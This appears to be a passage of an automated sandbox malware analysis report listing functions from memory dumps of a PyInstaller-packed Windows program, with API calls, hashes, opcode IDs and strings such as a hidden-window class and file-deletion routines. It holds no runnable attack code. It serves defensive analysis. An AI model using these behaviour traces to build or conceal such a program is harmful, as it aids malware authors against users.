                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                  • Instruction ID: 88af2b9d623369b6d1cd895eab9ed39b027310b3992d6538d0e58b66fffe3d1f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97018221A0874180EA16EB529D01079F6A2FFA5FF0FA84679DE5C13BD6CE3CD4118B54
                                                                                                                                                                                                                                  Function 00007FFBAA4B7700 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3568877910-0
                                                                                                                                                                                                                                  • Opcode ID: 95c5e0d44eb7a0b8d4589eac1939111dc9409e4064ba8ad035682a0dd4f1a0ba
                                                                                                                                                                                                                                  • Instruction ID: ad12827484adbacb03c790a92c0e694666959d612ed8e430ae58e1fe06757903
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95c5e0d44eb7a0b8d4589eac1939111dc9409e4064ba8ad035682a0dd4f1a0ba
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12111B62A0B642C7EB5A9F76E5543783368EF44B55F185470EE0E426A0CF3CF4968360
                                                                                                                                                                                                                                  Function 00007FF72C658E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C659390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72C6545F4,00000000,00007FF72C651985), ref: 00007FF72C6593C9
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00007FF72C656476,?,00007FF72C65336E), ref: 00007FF72C658EA2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2592636585-0
                                                                                                                                                                                                                                  • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                  • Instruction ID: f597c73dcd1af4e5b639807fa376710d3efcf5fd245a144cd4f7a46256896b84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBD08C01B2424642EA45B767BA466399252FBD9BD0F988035EE0D03B4ADC3CC0414B00
                                                                                                                                                                                                                                  Function 00007FFBAA496BEC Relevance: 1.5, APIs: 1, Instructions: 19networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2809346765-0
                                                                                                                                                                                                                                  • Opcode ID: f75e51da77dfc1082f19fe342fcab0b157519f4804096b52c81e4ca3d592fddb
                                                                                                                                                                                                                                  • Instruction ID: 4162956c79efd7461350ef72fd0c20d8b65e5672d72018b42e00aac1e4434702
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f75e51da77dfc1082f19fe342fcab0b157519f4804096b52c81e4ca3d592fddb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CE04FF2A15A45C2E7145B66E0856687364F719FB4F245721DE380B3E0DE38D5E2C740
                                                                                                                                                                                                                                  Function 00007FFBA609EF30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                  • Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                  • Instruction ID: 88106610d9e9ddefa7e9372e71a10f33df6a79a71324e5918afd1904ac9da72a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 272181B2B0878086D3649B32E58026EB2A6FB84F84F144035EF9843F95CF3CD4A1CB00
                                                                                                                                                                                                                                  Function 00007FFBA6091DF7 Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                  • Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                  • Instruction ID: c2b13c29c57f7c45fd851c90f2bed2bb1a2171ce4c8cff3adb160299278bbfc2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4521AEF2E0B25285FB76AE35E8C127922A2EF50F44F288435ED0D46695DF3CE8E1C611
                                                                                                                                                                                                                                  Function 00007FF72C66EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF72C66B32A,?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A), ref: 00007FF72C66EBED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                  • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                  • Instruction ID: af1b5697a959bb7637e601919f99bef49b76924b6adf7a91745dae5e59c700d1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26F04F58B0928240FE5B76B59D552B4E2A2FFA8B60FEC4538C90F462C1DD1CE4804A30
                                                                                                                                                                                                                                  Function 00007FF72C66D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF72C660C90,?,?,?,00007FF72C6622FA,?,?,?,?,?,00007FF72C663AE9), ref: 00007FF72C66D63A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                  • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                  • Instruction ID: 3cdae481fe8222b867514f97429f4788fea26aad7f90dec245290c66738413e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF0DA50E0924645FE5676725C51675A1A2EFA47B4FA84638DD2E866C2DD2CA4808A30

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FF72C6589E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                  • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                  • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                  • Instruction ID: aeca1c47379d912acac750598a1b9216697a077a5fed72815e5a2203fa9fd90c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48D19631A08A8386E711AF34EC552ADB7A2FFA47A8F900635DA5D43A94DF3CD149CB10
                                                                                                                                                                                                                                  Function 00007FFBA66A5CBC Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 364COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                                                                  • String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
                                                                                                                                                                                                                                  • API String ID: 3568877910-4109427827
                                                                                                                                                                                                                                  • Opcode ID: 3a8733b9f8724a0ad4dac92debb2868cdbdf7ad001dd02e936b03acc83697b27
                                                                                                                                                                                                                                  • Instruction ID: 89f261e03de25a7649daa42dd67d51b32bc6a40bb40710381cf89c87622bb45b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a8733b9f8724a0ad4dac92debb2868cdbdf7ad001dd02e936b03acc83697b27
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFF18FE1A0A68282EA568B39DD642B977B2BFA4F41F446435CE5EC3694DF3CE404DF10
                                                                                                                                                                                                                                  Function 00007FFBAA4C37E0 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B591ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2602518146-0
                                                                                                                                                                                                                                  • Opcode ID: e20b566639f2b49f24601b76cb9a21332238eac4db753b9772483f65c6a8b470
                                                                                                                                                                                                                                  • Instruction ID: cb9f46f23943a4298898f50c1560f555f3fff54d4231340cae52df4e722427ca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e20b566639f2b49f24601b76cb9a21332238eac4db753b9772483f65c6a8b470
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6314BB660AB81D6EB618F61E8803EE7378FB84744F44403AEA4D47B94DF3CD6498720
                                                                                                                                                                                                                                  Function 00007FFBA4173248 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949490443.00007FFBA4171000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FFBA4170000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949454231.00007FFBA4170000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41BA000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41C8000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421F000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949749489.00007FFBA4220000.00000080.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949783531.00007FFBA4222000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba4170000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B591ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2602518146-0
                                                                                                                                                                                                                                  • Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                  • Instruction ID: 83dd1b40009bd715617aaac99237b2f3ebfed25d7425da50800c075eafb18084
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A312FB2A0AB85C6EB628F60E8803E97764FB44754F44403ADB4E57BA9DF38D548CB10
                                                                                                                                                                                                                                  Function 00007FF72C6583C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C65842B
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584AE
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584CD
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584DB
                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584EC
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584F5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
